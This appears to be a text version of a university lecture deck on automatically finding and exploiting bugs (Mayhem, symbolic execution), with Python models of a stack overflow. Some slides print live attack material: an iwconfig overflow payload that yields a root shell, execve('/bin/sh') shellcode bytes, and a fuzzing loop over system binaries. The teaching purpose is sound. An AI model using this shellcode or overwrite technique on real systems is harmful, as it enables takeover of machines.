Checking the World’s Software for Exploitable Bugs David Brumley Carnegie Mellon University dbrumley@cmu.edu http://security.ece.cmu.edu/
An epic battle Black White vs. format c:
Exploit bugs Bug Black White format c:
OK Exploit
$ iwconfig accesspoint
$ iwconfig # 01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd
Superuser
Bug Fixed! Black White format c:
inp=`perl -e '{print "A"x8000}'`
for program in /usr/bin/*; do
  for opt in {a..z} {A..Z}; do
    timeout -s 9 1s $program -$opt $inp
  done
done
1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.
Which bugs are exploitable? Evil David
DEF CON 2012 scoreboard CMU Time (3 days total)
I skate to where the puck is going to be, not where it has been. --- Wayne Gretzky Hockey Hall of Fame
White Our Vision: Automatically Check the World’s Software for Exploitable Bugs
We owned the machine in seconds Evil David
Verification, but with a twist
Inputs: Program, and an Un-exploitability Property (in place of a Correctness Property)
Outputs: Safe paths (in place of Correct), or Exploit (in place of Incorrect)
33,248 programs. 152 new exploitable bugs.
Outline
• Basic exploitation
• Symbolic execution for exploit generation
• Automatic exploit generation on real code
• Experiments
• Related projects and the future
Control flow hijack: attacker gains control of execution
• buffer overflow
• format string attack
• heap metadata overwrite
• use-after-free
• ...
Same principle, different mechanism
Basic execution semantics of compiled code
• Processor: fetch, decode, execute. The instruction pointer (EIP) points to the next instruction to execute.
• Process memory: Code, Data, ..., Stack, Heap. The processor reads and writes it.
• Control flow hijack: EIP = attacker code
Buffer overflows and the runtime stack
int vulnerable(char *input)
{
    char buf[32];   /* local variables */
    int x;
    if (...) {
        x = 1;
    } else {
        x = 0;
    }
    strcpy(buf, input);
    return x;
}
Control flow hijack when input length > buffer length
(execution semantics, including call/return)
vulnerable’s initial stack frame: locals are allocated on the stack, toward the lower addresses.
int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }
input = “ABC\0”: strcpy writes ABC\0 into buf. Writes go up, from lower addresses toward higher ones.
“return address”: when caller(){ i: vulnerable(input); i+1: ... } makes the call, the address of i+1 is stored on the stack as the saved eip. On return, the processor loads EIP from the saved eip.
A buffer overflow occurs when data is written outside of the space allocated for the buffer.
• C does not check that writes are in bounds
Classic exploit: overwrite saved EIP
Traditionally we show exploitability by running shellcode*
* More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research
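The overwrite can be modeled without touching real memory. The Python sketch below treats the frame of vulnerable() as a flat byte array and imitates the unchecked copy that strcpy performs. The layout (32 bytes of buf, 4 bytes of x, 4 bytes of saved frame pointer, then the 4-byte saved EIP), the helper names, and both addresses are assumptions made for illustration; a real compiler may order or pad locals differently.

```python
import struct

BUF_SIZE = 32      # char buf[32]
X_SIZE = 4         # int x (assumed to sit directly above buf)
SAVED_EBP = 4      # assumed saved frame pointer
RET_OFFSET = BUF_SIZE + X_SIZE + SAVED_EBP   # saved EIP starts at byte 40
FRAME_SIZE = 64    # the frame plus a little of the caller's stack


def make_frame(return_address):
    """Return a zeroed frame whose saved-EIP slot holds return_address."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, RET_OFFSET, return_address)
    return frame


def unchecked_strcpy(frame, data):
    """Copy data up to its first NUL, plus the NUL, starting at buf[0].

    Like strcpy, the size of buf is never consulted. The only check is
    against the size of the simulated memory itself.
    """
    payload = data.split(b"\x00", 1)[0] + b"\x00"
    if len(payload) > len(frame):
        raise ValueError("payload larger than the simulated memory")
    frame[0:len(payload)] = payload


def saved_eip(frame):
    """Read the value a simulated return would load into EIP."""
    return struct.unpack_from("<I", frame, RET_OFFSET)[0]


CALLER = 0x08048123      # hypothetical address of instruction i+1
BUF_ADDR = 0xBFFFFCE8    # hypothetical address of buf

safe = make_frame(CALLER)
unchecked_strcpy(safe, b"ABC")

smashed = make_frame(CALLER)
unchecked_strcpy(smashed, b"A" * RET_OFFSET + struct.pack("<I", BUF_ADDR))

print(hex(saved_eip(safe)))
print(hex(saved_eip(smashed)))
```

With the short input the saved EIP still names the caller. With 40 filler bytes followed by an address, the simulated return goes wherever the input says.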
Shellcode is a string
execve(“/bin/sh”, 0, 0);
Compile to an executable string:
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php
input = shellcode . address of buf
strcpy(buf,input) copies the shellcode (\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f...) into buf and overwrites the saved eip with &buf.
Owned! On return, %eip = &buf = <shellcode>, which runs execve(“/bin/sh”, NULL).
Verification, but with a twist
Inputs: Program, and an Un-exploitability Property (in place of a Correctness Property)
Outputs: Safe path (in place of Correct), or Exploitable (in place of Incorrect)
We use symbolic execution to test paths [Boyer75, Howden75, King76]
Basic symbolic execution
x = input()                 x can be anything
if x > 42 (true)            x > 42
if x*x = MAXINT (false)     (x > 42) ∧ (x*x != MAXINT)
if x < 42 (false)           (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)
jmp stack[x]
The right-hand column is the path formula: it is true for exactly the inputs that take the path.
Basic symbolic execution: each path formula goes to a Satisfiability Modulo Theories (SMT) solver.
• (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42): satisfiable (x = 43). The solution is a test case for the path to jmp stack[x]!
• (x > 42) ∧ (x*x != MAXINT) ∧ (x < 42): UNSAT. The path is infeasible.
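To make the two solver outcomes concrete, the following Python sketch builds the path formula for a chosen sequence of branch outcomes and searches for a satisfying input. It is only an illustration: the exhaustive search over 0..255 stands in for a real SMT solver, so "no solution" here means none within that range. MAXINT = 0xffffffff, 32-bit wraparound, and all function names are assumptions.

```python
MAXINT = 0xFFFFFFFF   # assumed 32-bit value for MAXINT

# The three branch conditions of the example program, in program order.
BRANCHES = [
    lambda x: x > 42,
    lambda x: (x * x) & 0xFFFFFFFF == MAXINT,   # 32-bit multiply
    lambda x: x < 42,
]


def path_formula(decisions):
    """Return the constraints of one path.

    decisions[i] is True if branch i is taken, False if it falls through.
    """
    formula = []
    for cond, taken in zip(BRANCHES, decisions):
        if taken:
            formula.append(cond)
        else:
            formula.append(lambda x, c=cond: not c(x))
    return formula


def solve(formula, domain=range(256)):
    """Brute-force stand-in for an SMT solver.

    Returns the first x in domain satisfying every constraint, or None.
    """
    for x in domain:
        if all(constraint(x) for constraint in formula):
            return x
    return None


to_jump = solve(path_formula([True, False, False]))      # reaches jmp stack[x]
infeasible = solve(path_formula([True, False, True]))    # x > 42 and x < 42

print(to_jump, infeasible)
```

The first query yields a concrete input that drives execution down the path; the second has no solution because its constraints contradict each other.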
Checking non-exploitability
Un-exploitability property: EIP != user input
For each path, the SMT solver is asked: <path formula> ∧ eip != user input
Example: (x > 42) ∧ (x*x == MAXINT) ∧ Un-exploitable
• SAT (safe)
• UNSAT (exploit)
Real world exploit generation: a brief history
[Figure: timeline of our work and others’ work]
And >150 papers on symbolic execution
Exploiting Real Code: The Mayhem Architecture
Principles:
• Require only the binary, e.g., BAP, our binary analysis platform
• Use intelligent analysis to reduce state space, e.g., preconditioned symbolic execution
• Make queries to SMT as easy as possible, e.g., symbolic memories
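Potentially infinite state space
strcpy(buf, input); behaves like:
while(input[i] != 0){ buf[i] = input[i]; i++; } buf[i] = 0;
Symbolic execution unrolls the loop into one branch per input byte, each with a true and a false side:
if (input[0] != 0), if (input[1] != 0), …, if (input[n] != 0)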
Check every branch blindly
• if (input[0] != 0): 20 min exploration
• if (input[1] != 0): 30 min exploration
• …: x min exploration
• if (input[n] != 0): exploitable bug found
KLEE [Cadar’08] does this
Preconditioned symbolic execution
[Figure: nested sets: All Inputs, Trigger bug, Control Hijack]
Preconditions focus search, e.g.: input > len
(Slide note: input vs bugs doesn’t typecheck)
Other examples in [Avgerinos11]
Static and online analysis determines likely exploit conditions
• 40 bytes
• All non-NULL
char buf[32]; int x; ... strcpy(buf, input);
Example: length precondition
• if (input[0] != 0), false side. Precondition check: length(input) > 40 ∧ input[0] == 0. Unsatisfiable. Not explored. Saved 20 min.
• if (input[1] != 0), false side. Precondition check: length(input) > 40 ∧ input[1] == 0. Unsatisfiable. Not explored. Saved 30 min.
• … Not explored. Saved x min.
• if (input[n] != 0): exploitable bug found
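The pruning in this example can be sketched in a few lines of Python. The model is deliberately simplified and is an assumption, not Mayhem's implementation: each path through the unrolled strcpy loop is identified by the index k of the first NUL byte (so the string has length k), and the check "length(input) > 40 and input[k] == 0" is decided directly as k > 40 instead of by an SMT query. The function and parameter names are hypothetical.

```python
def explore_strcpy(max_len, min_len_exclusive=None):
    """Walk the unrolled strcpy loop for inputs of up to max_len bytes.

    At index k, the false side of 'input[k] != 0' ends the string at
    length k. That side is explored only if it is consistent with the
    precondition length(input) > min_len_exclusive.
    Returns (explored, pruned) as lists of string lengths.
    """
    explored, pruned = [], []
    for k in range(max_len + 1):
        if min_len_exclusive is not None and not k > min_len_exclusive:
            pruned.append(k)      # precondition and input[k] == 0 conflict
        else:
            explored.append(k)    # feasible path: worth analyzing further
    return explored, pruned


blind, _ = explore_strcpy(100)
focused, skipped = explore_strcpy(100, min_len_exclusive=40)

print(len(blind), len(focused), len(skipped))
```

Without a precondition every string length is a path to analyze; with it, the short strings that cannot reach past the 40-byte mark are discarded before any expensive analysis runs.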
Don’t treat the SMT solver as a black box! “Program” the SMT solver.
Query: (x > 42) ∧ (x*x != 0xffffffff) ∧ !(x < 42)
Answer: SAT (x = 43)
Symbolic memory indices
x := user_input();     (x can be anything)
<executed path>
y := mem[x];
assert(y = 42);
vulnerable();
Which memory cell contains 42? Memory spans addresses 0 to 2^32-1, so there are 2^32 cells to check.
Symbolic addresses occur often
c = get_char(); ... to_lower(c);
to_lower(char c){ return c >= -128 && c < 256 ? tbl[c] : c; }
tbl[c] reads address tbl+c (tbl+’A’ when c is ’A’). With symbolic c, the address is symbolic.
Other causes
• Parsing: sscanf, vfprintf, etc.
• Character test: isspace, isalpha, etc.
• Conversion: toupper, tolower, mbtowc, etc.
• …
Concretization: test case generation, e.g., SAGE, DART, CUTE, KLEE
x := user_input();
<executed path>
y := mem[30];
assert(y = 42);
vulnerable();
Memory spans addresses 0 to 2^32-1, but only 1 cell (address 30) is checked.
Misses over 40% of exploits
Observation: the path formula constrains the range of symbolic memory accesses
x can be anything
if x > 0 (true), if x < 5 (true): 0 < x < 5
y = mem[x]
assert(y==42)
Use symbolic execution state to:
Step 1: Bound memory addresses referenced
Step 2: Reduce to linear formulas
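Step 1 can be illustrated with a toy memory. In the Python sketch below, the path formula 0 < x < 5 bounds the symbolic index, so only four cells are examined instead of 2^32; Step 2 (reduction to linear formulas) is not shown. The dictionary-based memory, its contents, and the function names are assumptions for illustration.

```python
def bounded_indices(lower_exclusive, upper_exclusive):
    """Indices allowed by a path formula lower_exclusive < x < upper_exclusive."""
    return range(lower_exclusive + 1, upper_exclusive)


def cells_equal_to(mem, indices, wanted):
    """Return every index x in indices for which mem[x] == wanted."""
    return [x for x in indices if mem.get(x, 0) == wanted]


# Hypothetical sparse memory: cells that are not listed read as 0.
mem = {3: 42, 30: 7}

# Symbolic index bounded by the path formula 0 < x < 5: check cells 1..4.
symbolic_hits = cells_equal_to(mem, bounded_indices(0, 5), 42)

# Concretization: commit to the single index 30 and check only that cell.
concrete_hits = cells_equal_to(mem, [30], 42)

print(symbolic_hits, concrete_hits)
```

Keeping the index symbolic within its bounds finds the cell holding 42, while the concretized run looks at one cell and misses it.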